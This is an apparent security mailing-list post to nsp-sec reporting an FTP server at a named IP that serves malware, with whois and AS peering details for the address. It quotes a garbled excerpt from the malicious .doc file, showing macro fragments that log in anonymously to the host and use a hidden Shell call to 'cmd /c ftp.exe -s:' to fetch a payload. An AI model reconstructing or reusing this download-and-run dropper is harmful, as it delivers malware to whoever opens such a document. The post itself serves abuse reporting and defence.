[nsp-sec] malware FTP server in AS209

[Daniel Adinolfi]

Folks,

Embedded in a .doc file that was identified through one of the NSP-SEC  
feeds, we found the following FTP server serving up malware.

[ Informations about 209.201.88.110 ]

  IP range     :    209.201.88.0 - 209.201.89.255
  Network name :    ICON-NET-VDI-1
  Infos        :    VDI
  Infos        :    61 Belleville Avenue
  Infos        :    Bloomfield
  Infos        :    NJ
  Infos        :    07003
  Country      :    United States (US)
  Abuse E-mail :    support at iconnet.net
  Source       :    ARIN

AS      | IP               | AS Name
209     | 209.201.88.110   | ASN-QWEST - Qwest
PEER_AS | IP               | AS Name
174     | 209.201.88.110   | COGENT Cogent/PSI
701     | 209.201.88.110   | UUNET - MCI Communications Services, Inc.  
d/b/a Verizon Business
1239    | 209.201.88.110   | SPRINTLINK - Sprint
2516    | 209.201.88.110   | KDDI KDDI CORPORATION
2828    | 209.201.88.110   | XO-AS15 - XO Communications
2914    | 209.201.88.110   | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3257    | 209.201.88.110   | TISCALI-BACKBONE Tiscali Intl Network BV
3320    | 209.201.88.110   | DTAG Deutsche Telekom AG
3356    | 209.201.88.110   | LEVEL3 Level 3 Communications
3549    | 209.201.88.110   | GBLX Global Crossing Ltd.
6453    | 209.201.88.110   | GLOBEINTERNET TATA Communications
7132    | 209.201.88.110   | SBIS-AS - AT&T Internet Services
7473    | 209.201.88.110   | SINGTEL-AS-AP Singapore Telecom

An excerpt from the .doc file:
	"c:\netldx.vxd" ?
"o 209.201.88.?110?"u? anonymou?pass @itsme@?c d inc??ng??ascii?A ? 
H'ui???(? Shell "A?mand.? /c ftp.exe -n -s:?$, vbHi?d`?g3??K???A?ٟA=  
cr?Ed32PMake sur?e`Pat so???cond c?q ?H t?| befo at we ?tin?ue?1ming?y?s? 
f@(? ~X?1?AQq?2!

Happy hunting,

-Dan


_________________
Daniel Adinolfi, CISSP
Senior Security Engineer, IT Security Office
Cornell University - Office of Information Technologies
email: dra1 at cornell.edu   phone: 607-255-7657